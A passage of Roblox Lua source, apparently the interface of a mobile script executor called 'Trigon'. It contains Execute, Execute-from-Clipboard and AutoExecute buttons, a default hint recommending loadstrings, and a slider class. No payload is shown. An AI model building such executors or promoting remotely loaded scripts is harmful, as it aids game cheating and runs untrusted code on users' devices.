trii.autoload.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.autoload.Name = "autoload" trii.autoload.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.autoload.Parent = trii.Buttons trii.UIListLayout_12.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_12.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_12.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout_12.Parent = trii.autoload trii.button_1.ZIndex = 2 trii.button_1.BorderSizePixel = 0 trii.button_1.ScaleType = Enum.ScaleType.Fit trii.button_1.Image = "rbxassetid://3926305904" trii.button_1.ImageRectSize = Vector2.new(36, 36) trii.button_1.Size = UDim2.new(0.31389, 0, 0.496509, 0) trii.button_1.Name = "button" trii.button_1.LayoutOrder = 1 trii.button_1.BackgroundTransparency = 1 trii.button_1.Position = UDim2.new(0, 0, 0.251746, 0) trii.button_1.ImageRectOffset = Vector2.new(724, 724) trii.button_1.Parent = trii.autoload trii.zz.TextWrapped = true trii.zz.BorderSizePixel = 0 trii.zz.RichText = true trii.zz.TextScaled = true trii.zz.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.zz.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.zz.TextSize = 14 trii.zz.Name = "zz" trii.zz.Size = UDim2.new(0.592892, 0, 0.503491, 0) trii.zz.TextColor3 = Color3.fromRGB(240, 240, 240) trii.zz.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.zz.Text = "AutoExecute" trii.zz.Position = UDim2.new(0.355672, 0, 0.248254, 0) trii.zz.BackgroundTransparency = 1 trii.zz.Parent = trii.autoload trii.UICorner_26.CornerRadius = UDim.new(0.06, 0) trii.UICorner_26.Parent = trii.autoload trii.delete.BorderSizePixel = 0 trii.delete.Size = UDim2.new(0.219148, 0, 1, 0) trii.delete.Position = UDim2.new(0.780852, 0, 0, 0) trii.delete.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.delete.Name = "delete" trii.delete.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.delete.Parent = trii.Buttons trii.UIListLayout_13.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_13.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_13.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_13.ItemLineAlignment = Enum.ItemLineAlignment.Center trii.UIListLayout_13.Parent = trii.delete trii.UICorner_27.CornerRadius = UDim.new(0.06, 0) trii.UICorner_27.Parent = trii.delete trii.button_2.ZIndex = 2 trii.button_2.BorderSizePixel = 0 trii.button_2.ScaleType = Enum.ScaleType.Fit trii.button_2.Image = "rbxassetid://3926305904" trii.button_2.ImageRectSize = Vector2.new(36, 36) trii.button_2.Size = UDim2.new(0.5, 0, 0.5, 0) trii.button_2.Name = "button" trii.button_2.BackgroundTransparency = 1 trii.button_2.Position = UDim2.new(0.5, 0, 0.5, 0) trii.button_2.ImageRectOffset = Vector2.new(644, 724) trii.button_2.Parent = trii.delete trii.UICorner_28.CornerRadius = UDim.new(0.06, 0) trii.UICorner_28.Parent = trii.script_placeholder trii.addlocalscriptsFrame.BorderSizePixel = 0 trii.addlocalscriptsFrame.CanvasSize = UDim2.new(0, 0, 1, 0) trii.addlocalscriptsFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.addlocalscriptsFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y trii.addlocalscriptsFrame.Size = UDim2.new(0.43768, 0, 1, 0) trii.addlocalscriptsFrame.BackgroundTransparency = 0.35 trii.addlocalscriptsFrame.Active = true trii.addlocalscriptsFrame.ScrollBarImageTransparency = 0.64 trii.addlocalscriptsFrame.ScrollBarThickness = 5 trii.addlocalscriptsFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.addlocalscriptsFrame.Name = "addlocalscriptsFrame" trii.addlocalscriptsFrame.Position = UDim2.new(0.56232, 0, 0, 0) trii.addlocalscriptsFrame.Parent = trii.homeFrame trii.UICorner_29.CornerRadius = UDim.new(1, 0) trii.UICorner_29.Parent = trii.addlocalscriptsFrame trii.UIListLayout_14.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_14.SortOrder = Enum.SortOrder.LayoutOrder trii.UIListLayout_14.Padding = UDim.new(0.01, 0) trii.UIListLayout_14.Parent = trii.addlocalscriptsFrame trii._GameHeader_2.BorderSizePixel = 0 trii._GameHeader_2.Size = UDim2.new(1, 0, 0.157089, 0) trii._GameHeader_2.BorderColor3 = Color3.fromRGB(0, 0, 0) trii._GameHeader_2.Name = "#GameHeader" trii._GameHeader_2.BackgroundColor3 = Color3.fromRGB(35, 39, 49) trii._GameHeader_2.Parent = trii.addlocalscriptsFrame trii.Title_10.TextWrapped = true trii.Title_10.BorderSizePixel = 0 trii.Title_10.TextScaled = true trii.Title_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_10.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_10.TextSize = 14 trii.Title_10.Name = "Title" trii.Title_10.Size = UDim2.new(0.631911, 0, 0.572671, 0) trii.Title_10.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_10.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_10.Text = "Local Scripts" trii.Title_10.Position = UDim2.new(0, 0, 0.2, 0) trii.Title_10.BackgroundTransparency = 1 trii.Title_10.Parent = trii._GameHeader_2 trii.UICorner_30.CornerRadius = UDim.new(0.1, 0) trii.UICorner_30.Parent = trii._GameHeader_2 trii.Frame.BorderSizePixel = 0 trii.Frame.Size = UDim2.new(0.345421, 0, 0.482072, 0) trii.Frame.Position = UDim2.new(0.63191, 0, 0.290598, 0) trii.Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Frame.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.Frame.Parent = trii._GameHeader_2 trii.TextButton_2.TextWrapped = true trii.TextButton_2.BorderSizePixel = 0 trii.TextButton_2.RichText = true trii.TextButton_2.TextScaled = true trii.TextButton_2.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.TextButton_2.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextButton_2.Position = UDim2.new(0.0427491, 0, 0.159589, 0) trii.TextButton_2.TextSize = 14 trii.TextButton_2.Size = UDim2.new(0.909327, 0, 0.659937, 0) trii.TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255) trii.TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextButton_2.Text = "+ Add Script" trii.TextButton_2.BackgroundTransparency = 1 trii.TextButton_2.Parent = trii.Frame trii.UICorner_31.CornerRadius = UDim.new(0.1, 0) trii.UICorner_31.Parent = trii.Frame trii.addFrame.BorderSizePixel = 0 trii.addFrame.Size = UDim2.new(1, 0, 0.529673, 0) trii.addFrame.Position = UDim2.new(0, 0, 0.178546, 0) trii.addFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.addFrame.Name = "addFrame" trii.addFrame.BackgroundColor3 = Color3.fromRGB(35, 39, 49) trii.addFrame.Parent = trii.addlocalscriptsFrame trii.input.BorderSizePixel = 0 trii.input.Size = UDim2.new(1, 0, 0.178707, 0) trii.input.Position = UDim2.new(0, 0, 0.491846, 0) trii.input.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.input.Name = "input" trii.input.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.input.Parent = trii.addFrame trii.TextBox_1.TextWrapped = true trii.TextBox_1.BorderSizePixel = 0 trii.TextBox_1.RichText = true trii.TextBox_1.TextScaled = true trii.TextBox_1.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.TextBox_1.FontFace = Font.new("rbxasset://fonts/families/SourceSansPro.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextBox_1.Position = UDim2.new(0.0158423, 0, 0.172555, 0) trii.TextBox_1.PlaceholderText = "{Text and Numbers Only}" trii.TextBox_1.TextSize = 14 trii.TextBox_1.Size = UDim2.new(0.961489, 0, 0.645422, 0) trii.TextBox_1.TextColor3 = Color3.fromRGB(0, 0, 0) trii.TextBox_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextBox_1.Text = "" trii.TextBox_1.CursorPosition = -1 trii.TextBox_1.ClearTextOnFocus = false trii.TextBox_1.Parent = trii.input trii.Title_11.TextWrapped = true trii.Title_11.BorderSizePixel = 0 trii.Title_11.TextScaled = true trii.Title_11.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_11.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_11.TextSize = 14 trii.Title_11.Name = "Title" trii.Title_11.Size = UDim2.new(0.261373, 0, 0.111787, 0) trii.Title_11.TextColor3 = Color3.fromRGB(180, 193, 216) trii.Title_11.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_11.Text = "Script Name:" trii.Title_11.Position = UDim2.new(0.00832818, 0, 0.361132, 0) trii.Title_11.BackgroundTransparency = 1 trii.Title_11.Parent = trii.addFrame trii.TextLabel_5.TextWrapped = true trii.TextLabel_5.BorderSizePixel = 0 trii.TextLabel_5.TextScaled = true trii.TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.TextLabel_5.FontFace = Font.new("rbxasset://fonts/families/Inconsolata.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextLabel_5.TextSize = 14 trii.TextLabel_5.Size = UDim2.new(0.961488, 0, 0.222536, 0) trii.TextLabel_5.TextColor3 = Color3.fromRGB(225, 225, 225) trii.TextLabel_5.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextLabel_5.Text = "Note: You just need to set the script name. The script will be added from your clipboard, so make sure to copy it before adding it." trii.TextLabel_5.Position = UDim2.new(0.0158422, 0, 0.0507511, 0) trii.TextLabel_5.BackgroundTransparency = 1 trii.TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left trii.TextLabel_5.Parent = trii.addFrame trii.confrim_btn.BorderSizePixel = 0 trii.confrim_btn.Size = UDim2.new(0.345421, 0, 0.157611, 0) trii.confrim_btn.Position = UDim2.new(0.542995, 0, 0.709694, 0) trii.confrim_btn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.confrim_btn.Name = "confrim_btn" trii.confrim_btn.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.confrim_btn.Parent = trii.addFrame trii.TextButton_3.TextWrapped = true trii.TextButton_3.BorderSizePixel = 0 trii.TextButton_3.RichText = true trii.TextButton_3.TextScaled = true trii.TextButton_3.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.TextButton_3.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextButton_3.Position = UDim2.new(0.0427491, 0, 0.159589, 0) trii.TextButton_3.TextSize = 14 trii.TextButton_3.Size = UDim2.new(0.909327, 0, 0.659937, 0) trii.TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255) trii.TextButton_3.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextButton_3.Text = "Confrim" trii.TextButton_3.BackgroundTransparency = 1 trii.TextButton_3.Parent = trii.confrim_btn trii.UICorner_32.CornerRadius = UDim.new(0.1, 0) trii.UICorner_32.Parent = trii.confrim_btn trii.cancel_btn.BorderSizePixel = 0 trii.cancel_btn.Size = UDim2.new(0.345421, 0, 0.157611, 0) trii.cancel_btn.Position = UDim2.new(0.179819, 0, 0.709694, 0) trii.cancel_btn.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.cancel_btn.Name = "cancel_btn" trii.cancel_btn.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.cancel_btn.Parent = trii.addFrame trii.TextButton_4.TextWrapped = true trii.TextButton_4.BorderSizePixel = 0 trii.TextButton_4.RichText = true trii.TextButton_4.TextScaled = true trii.TextButton_4.BackgroundColor3 = Color3.fromRGB(55, 60, 76) trii.TextButton_4.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.TextButton_4.Position = UDim2.new(0.0427491, 0, 0.159589, 0) trii.TextButton_4.TextSize = 14 trii.TextButton_4.Size = UDim2.new(0.909327, 0, 0.659937, 0) trii.TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255) trii.TextButton_4.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.TextButton_4.Text = "Cancel" trii.TextButton_4.BackgroundTransparency = 1 trii.TextButton_4.Parent = trii.cancel_btn trii.UICorner_33.CornerRadius = UDim.new(0.1, 0) trii.UICorner_33.Parent = trii.cancel_btn trii.ExecFrame.Active = true trii.ExecFrame.BorderSizePixel = 0 trii.ExecFrame.Size = UDim2.new(0.949745, 0, 0.649132, 0) trii.ExecFrame.Position = UDim2.new(0.0244645, 0, 0.0897571, 0) trii.ExecFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ExecFrame.Visible = false trii.ExecFrame.Name = "ExecFrame" trii.ExecFrame.BackgroundColor3 = Color3.fromRGB(38, 42, 53) trii.ExecFrame.Parent = trii.MainFrame trii.Buttons_1.Active = true trii.Buttons_1.BorderSizePixel = 0 trii.Buttons_1.Size = UDim2.new(1, 0, 0.246428, 0) trii.Buttons_1.Position = UDim2.new(0, 0, 0.752548, 0) trii.Buttons_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Buttons_1.Name = "Buttons" trii.Buttons_1.BackgroundColor3 = Color3.fromRGB(31, 34, 43) trii.Buttons_1.Parent = trii.ExecFrame trii.UIListLayout_15.FillDirection = Enum.FillDirection.Horizontal trii.UIListLayout_15.HorizontalAlignment = Enum.HorizontalAlignment.Center trii.UIListLayout_15.VerticalAlignment = Enum.VerticalAlignment.Center trii.UIListLayout_15.Padding = UDim.new(0.01, 0) trii.UIListLayout_15.Parent = trii.Buttons_1 trii.Button1.BorderSizePixel = 3 trii.Button1.ScaleType = Enum.ScaleType.Fit trii.Button1.AutoButtonColor = false trii.Button1.BackgroundColor3 = Color3.fromRGB(44, 48, 61) trii.Button1.BorderMode = Enum.BorderMode.Inset trii.Button1.Selectable = false trii.Button1.AnchorPoint = Vector2.new(0.5, 0.5) trii.Button1.Size = UDim2.new(0.226347, 0, 0.721644, 0) trii.Button1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Button1.Name = "Button1" trii.Button1.Position = UDim2.new(0.145479, 0, 0.454178, 0) trii.Button1.Parent = trii.Buttons_1 trii.UIStroke_6.LineJoinMode = Enum.LineJoinMode.Miter trii.UIStroke_6.Thickness = 3 trii.UIStroke_6.Color = Color3.fromRGB(60, 66, 83) trii.UIStroke_6.Enabled = false trii.UIStroke_6.Parent = trii.Button1 trii.UICorner_34.CornerRadius = UDim.new(0.08, 0) trii.UICorner_34.Parent = trii.Button1 trii.Title_12.TextWrapped = true trii.Title_12.BorderSizePixel = 0 trii.Title_12.TextScaled = true trii.Title_12.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_12.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_12.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_12.TextSize = 100 trii.Title_12.Name = "Title" trii.Title_12.Size = UDim2.new(0.340682, 0, 0.729158, 0) trii.Title_12.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_12.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_12.Text = "Execute" trii.Title_12.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Title_12.BackgroundTransparency = 1 trii.Title_12.Parent = trii.Button1 trii.Button4.BorderSizePixel = 3 trii.Button4.ScaleType = Enum.ScaleType.Fit trii.Button4.AutoButtonColor = false trii.Button4.BackgroundColor3 = Color3.fromRGB(44, 48, 61) trii.Button4.BorderMode = Enum.BorderMode.Inset trii.Button4.Selectable = false trii.Button4.AnchorPoint = Vector2.new(0.5, 0.5) trii.Button4.Size = UDim2.new(0.226347, 0, 0.721644, 0) trii.Button4.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Button4.Name = "Button4" trii.Button4.Position = UDim2.new(0.854521, 0, 0.454178, 0) trii.Button4.Parent = trii.Buttons_1 trii.Title_13.TextWrapped = true trii.Title_13.BorderSizePixel = 0 trii.Title_13.TextScaled = true trii.Title_13.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_13.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_13.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_13.TextSize = 14 trii.Title_13.Name = "Title" trii.Title_13.Size = UDim2.new(0.313498, 0, 0.782088, 0) trii.Title_13.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_13.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_13.Text = "Clear" trii.Title_13.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Title_13.BackgroundTransparency = 1 trii.Title_13.Parent = trii.Button4 trii.UICorner_35.CornerRadius = UDim.new(0.08, 0) trii.UICorner_35.Parent = trii.Button4 trii.UIStroke_7.LineJoinMode = Enum.LineJoinMode.Miter trii.UIStroke_7.Thickness = 3 trii.UIStroke_7.Color = Color3.fromRGB(60, 66, 83) trii.UIStroke_7.Enabled = false trii.UIStroke_7.Parent = trii.Button4 trii.Button3.BorderSizePixel = 3 trii.Button3.ScaleType = Enum.ScaleType.Fit trii.Button3.AutoButtonColor = false trii.Button3.BackgroundColor3 = Color3.fromRGB(44, 48, 61) trii.Button3.BorderMode = Enum.BorderMode.Inset trii.Button3.Selectable = false trii.Button3.AnchorPoint = Vector2.new(0.5, 0.5) trii.Button3.Size = UDim2.new(0.226347, 0, 0.721644, 0) trii.Button3.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Button3.Name = "Button3" trii.Button3.Position = UDim2.new(0.618174, 0, 0.454178, 0) trii.Button3.Parent = trii.Buttons_1 trii.Title_14.TextWrapped = true trii.Title_14.BorderSizePixel = 0 trii.Title_14.TextScaled = true trii.Title_14.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_14.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_14.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_14.TextSize = 14 trii.Title_14.Name = "Title" trii.Title_14.Size = UDim2.new(0.347791, 0, 0.782034, 0) trii.Title_14.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_14.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_14.Text = "Paste" trii.Title_14.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Title_14.BackgroundTransparency = 1 trii.Title_14.Parent = trii.Button3 trii.UICorner_36.CornerRadius = UDim.new(0.08, 0) trii.UICorner_36.Parent = trii.Button3 trii.UIStroke_8.LineJoinMode = Enum.LineJoinMode.Miter trii.UIStroke_8.Thickness = 3 trii.UIStroke_8.Color = Color3.fromRGB(60, 66, 83) trii.UIStroke_8.Enabled = false trii.UIStroke_8.Parent = trii.Button3 trii.Button2.BorderSizePixel = 3 trii.Button2.ScaleType = Enum.ScaleType.Fit trii.Button2.AutoButtonColor = false trii.Button2.BackgroundColor3 = Color3.fromRGB(44, 48, 61) trii.Button2.BorderMode = Enum.BorderMode.Inset trii.Button2.Selectable = false trii.Button2.AnchorPoint = Vector2.new(0.5, 0.5) trii.Button2.Size = UDim2.new(0.226347, 0, 0.721644, 0) trii.Button2.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Button2.Name = "Button2" trii.Button2.Position = UDim2.new(0.381826, 0, 0.454178, 0) trii.Button2.Parent = trii.Buttons_1 trii.Title_15.TextWrapped = true trii.Title_15.BorderSizePixel = 0 trii.Title_15.TextScaled = true trii.Title_15.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.Title_15.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.Title_15.AnchorPoint = Vector2.new(0.5, 0.5) trii.Title_15.TextSize = 14 trii.Title_15.Name = "Title" trii.Title_15.Size = UDim2.new(0.730181, 0, 0.653414, 0) trii.Title_15.TextColor3 = Color3.fromRGB(250, 250, 250) trii.Title_15.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.Title_15.Text = "Execute from Clipboard" trii.Title_15.Position = UDim2.new(0.5, 0, 0.5, 0) trii.Title_15.BackgroundTransparency = 1 trii.Title_15.Parent = trii.Button2 trii.UICorner_37.CornerRadius = UDim.new(0.08, 0) trii.UICorner_37.Parent = trii.Button2 trii.UIStroke_9.LineJoinMode = Enum.LineJoinMode.Miter trii.UIStroke_9.Thickness = 3 trii.UIStroke_9.Color = Color3.fromRGB(60, 66, 83) trii.UIStroke_9.Enabled = false trii.UIStroke_9.Parent = trii.Button2 trii.UICorner_38.CornerRadius = UDim.new(0.1, 0) trii.UICorner_38.Parent = trii.Buttons_1 trii.ScrollingFrame.BorderSizePixel = 0 trii.ScrollingFrame.CanvasSize = UDim2.new(0, 0, 1, 0) trii.ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) trii.ScrollingFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y trii.ScrollingFrame.Size = UDim2.new(0.975214, 0, 0.675238, 0) trii.ScrollingFrame.BackgroundTransparency = 1 trii.ScrollingFrame.Active = true trii.ScrollingFrame.ScrollBarImageTransparency = 0.64 trii.ScrollingFrame.ScrollBarThickness = 18 trii.ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ScrollingFrame.Position = UDim2.new(0.0167858, 0, 0.0257617, 0) trii.ScrollingFrame.Parent = trii.ExecFrame trii.LocalScript.Parent = trii.ScrollingFrame trii.ScriptBox_1.BorderSizePixel = 0 trii.ScriptBox_1.RichText = true trii.ScriptBox_1.TextYAlignment = Enum.TextYAlignment.Top trii.ScriptBox_1.BackgroundColor3 = Color3.fromRGB(75, 0, 0) trii.ScriptBox_1.FontFace = Font.new("rbxasset://fonts/families/Nunito.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal) trii.ScriptBox_1.BackgroundTransparency = 1 trii.ScriptBox_1.AutomaticSize = Enum.AutomaticSize.Y trii.ScriptBox_1.TextSize = 30 trii.ScriptBox_1.ClipsDescendants = true trii.ScriptBox_1.Size = UDim2.new(1, 0, 1, 0) trii.ScriptBox_1.TextColor3 = Color3.fromRGB(255, 255, 255) trii.ScriptBox_1.BorderColor3 = Color3.fromRGB(0, 0, 0) trii.ScriptBox_1.Text = "-- We recommend only uisng loadstrings | Trigon Mobile v0.03 {Beta}" trii.ScriptBox_1.MultiLine = true trii.ScriptBox_1.Name = "ScriptBox" trii.ScriptBox_1.TextXAlignment = Enum.TextXAlignment.Left trii.ScriptBox_1.ClearTextOnFocus = false trii.ScriptBox_1.Parent = trii.ScrollingFrame trii.Highlighter.Name = "Highlighter" trii.Highlighter.Parent = trii.ScriptBox_1 trii.lexer.Name = "lexer" trii.lexer.Parent = trii.Highlighter trii.language.Name = "language" trii.language.Parent = trii.lexer trii.theme.Name = "theme" trii.theme.Parent = trii.Highlighter trii.types.Name = "types" trii.types.Parent = trii.Highlighter trii.utility.Name = "utility" trii.utility.Parent = trii.Highlighter trii.UICorner_39.CornerRadius = UDim.new(0.02, 0) trii.UICorner_39.Parent = trii.ExecFrame trii.LocalScript_1.Parent = trii.TrigonMain trii.savescripts.Name = "savescripts" trii.savescripts.Parent = trii.TrigonMain local modules, cache = {}, {} local o_require = require; local function require(module) local real, cached = modules[module], cache[module] if cached then return cached end if not real then return o_require(module) end cache[module] = real() return cache[module] end modules[trii.FormSliderClass] = function() local script = trii.FormSliderClass --[[ Copyright © 2023, MapleMarvel (https://www.roblox.com/users/263710410/profile). All Rights Reserved. FormSliderClass: Class that sets slider functionality. --]] -- Class local FormSliderClass = {} FormSliderClass.__index = FormSliderClass -- Constructor function FormSliderClass.new(paramGuiObject, paramDirection, minvalue, maxvalue) local self = setmetatable({}, FormSliderClass) -- Validate if paramGuiObject == nil then error("Required parameters missing for constructor FormSliderClass.new.") end -- Instance Properties self.GuiObject = paramGuiObject -- The GuiObject extended by this class self.Direction = paramDirection or Enum.Axis.X -- Slider direction self.Connections = {} -- Event connections -- Initialize -- Configuration Variables local configuration = self.GuiObject:WaitForChild("Configuration") local guiObjectBarBackgroundVar = configuration:WaitForChild("ObjectBarBackground") local guiObjectBarForegroundVar = configuration:WaitForChild("ObjectBarForeground") local guiObjectThumbNormalVar = configuration:WaitForChild(("ObjectThumbNormal")) local guiObjectThumbPressedVar = configuration:WaitForChild(("ObjectThumbPressed")) local guiObjectBarBackground local guiObjectBarForeground local guiObjectThumbNormal local guiObjectThumbPressed -- Validate if guiObjectBarBackgroundVar and guiObjectBarForegroundVar and guiObjectThumbNormalVar and guiObjectThumbPressedVar then -- Wait for the objects to load while not guiObjectBarBackgroundVar.Value do task.wait() end while not guiObjectBarForegroundVar.Value do task.wait() end while not guiObjectThumbNormalVar.Value do task.wait() end while not guiObjectThumbPressedVar.Value do task.wait() end -- Get values guiObjectBarBackground = guiObjectBarBackgroundVar.Value guiObjectBarForeground = guiObjectBarForegroundVar.Value guiObjectThumbNormal = guiObjectThumbNormalVar.Value guiObjectThumbPressed = guiObjectThumbPressedVar.Value end -- Make thumb draggable local ExtendDraggableClass = require(script.Parent:WaitForChild("ExtendDraggableClass")) local draggableThumbNormal = ExtendDraggableClass.new(guiObjectThumbNormal, false, self.Direction) -- Local function local function RefreshGui() -- Get current attribute values local attributesParent = self.GuiObject local attributeIsEnabled = attributesParent:GetAttribute("IsEnabled") local attributeColorDisabled1 = attributesParent:GetAttribute("ColorDisabled1") local attributeColorDisabled2 = attributesParent:GetAttribute("ColorDisabled2") local attributeColorEnabled1 = attributesParent:GetAttribute("ColorEnabled1") local attributeColorEnabled2 = attributesParent:GetAttribute("ColorEnabled2") local attributeValueIncrement = attributesParent:GetAttribute(("ValueIncrement")) local attributeValuePercent = attributesParent:GetAttribute(("ValuePercent")) warn(minvalue, maxvalue) -- Validate local newValuePercent = math.clamp(attributeValuePercent, minvalue, maxvalue) if newValuePercent ~= attributeValuePercent then attributesParent:SetAttribute("ValuePercent", newValuePercent) end -- Update slider elements if self.Direction == Enum.Axis.X then -- Horizontal -- Thumb position guiObjectThumbNormal.Position = UDim2.new(newValuePercent / maxvalue, guiObjectThumbNormal.Position.X.Offset, guiObjectThumbNormal.Position.Y.Scale, guiObjectThumbNormal.Position.Y.Offset) -- Foreground bar length guiObjectBarForeground.Size = UDim2.new(newValuePercent / maxvalue, guiObjectBarForeground.Size.X.Offset, guiObjectBarForeground.Size.Y.Scale, guiObjectBarForeground.Size.Y.Offset) else -- Vertical -- Thumb position guiObjectThumbNormal.Position = UDim2.new(guiObjectThumbNormal.Position.X.Scale, guiObjectThumbNormal.Position.X.Offset, 1 - (newValuePercent / maxvalue), guiObjectThumbNormal.Position.Y.Offset) -- Foreground bar length guiObjectBarForeground.Size = UDim2.new(guiObjectBarForeground.Size.X.Scale, guiObjectBarForeground.Size.X.Offset, newValuePercent / maxvalue, guiObjectBarForeground.Size.Y.Offset) end -- Dragging settings draggableThumbNormal:SetDraggingEnabled(attributeIsEnabled) draggableThumbNormal:SetDraggingIncrement(attributeValueIncrement) -- If enabled if attributeIsEnabled == true then -- Enabled colors guiObjectBarBackground.BackgroundColor3 = attributeColorEnabled1 guiObjectBarForeground.BackgroundColor3 = attributeColorEnabled2 guiObjectThumbNormal.ImageColor3 = attributeColorEnabled2 guiObjectThumbPressed.ImageColor3 = attributeColorEnabled2 else -- Disabled colors guiObjectBarBackground.BackgroundColor3 = attributeColorDisabled1 guiObjectBarForeground.BackgroundColor3 = attributeColorDisabled2 guiObjectThumbNormal.ImageColor3 = attributeColorDisabled2 guiObjectThumbPressed.ImageColor3 = attributeColorDisabled2 end end -- Refresh Gui RefreshGui() -- Disconnect existing connections local keyConnection1 = "AttributeChanged" local keyConnection2 = "ThumbPosition" local keyConnection3 = "AttributeChangedSignal" .. "IsDragging" if self.Connections[keyConnection1] then self.Connections[keyConnection1]:Disconnect() end if self.Connections[keyConnection2] then self.Connections[keyConnection2]:Disconnect() end if self.Connections[keyConnection3] then self.Connections[keyConnection3]:Disconnect() end -- Events -- Attribute Event - AttributeChanged -- Triggered when any attribute changes self.Connections[keyConnection1] = self.GuiObject.AttributeChanged:Connect(function(attributeName) RefreshGui() end) -- Instance Event - GetPropertyChangedSignal -- Triggered when thumb is dragged self.Connections[keyConnection2] = guiObjectThumbNormal:GetPropertyChangedSignal("Position"):Connect(function() -- Get current attribute values local attributesParent = self.GuiObject local attributeValuePercent = attributesParent:GetAttribute(("ValuePercent")) -- Get new thumb position local thumbPositionPercent = 0 if self.Direction == Enum.Axis.X then thumbPositionPercent = guiObjectThumbNormal.Position.X.Scale * maxvalue else thumbPositionPercent = (1 - guiObjectThumbNormal.Position.Y.Scale) * maxvalue -- Zero is at the bottom end -- Update slider value based on thumb position local newValuePercent = math.clamp(thumbPositionPercent, minvalue, maxvalue) if newValuePercent ~= attributeValuePercent then attributesParent:SetAttribute("ValuePercent", newValuePercent) end end) -- Attribute Event - GetAttributeChangedSignal -- Triggered when specific attribute changes self.Connections[keyConnection3] = guiObjectThumbNormal:GetAttributeChangedSignal("IsDragging"):Connect(function() -- Show pressed thumb when dragging local attributeIsDragging = 